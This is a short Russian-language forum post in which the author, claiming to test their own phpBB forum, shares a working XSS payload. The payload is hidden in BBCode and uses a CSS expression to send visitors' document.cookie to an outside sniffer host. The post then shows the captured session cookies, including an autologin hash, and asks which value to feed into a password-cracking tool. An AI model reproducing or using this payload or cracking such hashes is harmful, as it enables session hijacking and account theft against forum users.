В общем так...я решил проверить свой форум... Прочитав литературу на тему про взлом, все-таки решился его проверить, а именно на XSS нападение...создал тему на форуме и написал след. в теле сообщения:

[ color=#EFEFEF][ url]www.ut[ url=www.s=''style='font-size:0;color:#EFEFEF' style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]

Затем смотрю лог снифера и вижу след.:

REFERER="Не важно "
QUERY=phpbb2mysql_sid=e2030d55aeab5d87b85fbeb7f4d7 3b99; phpbb2mysql_f=a:1:{i:7;i:1126257852;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"429 7f44b13955235245b2497399d7a93";s:6:"userid";i:3;}; phpbb2mysql_t=a:2:{i:140;i:1126275407;i:128;i:1126 275061;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Вот вопрос, чтоже мне из этого пихать в PasswordPro?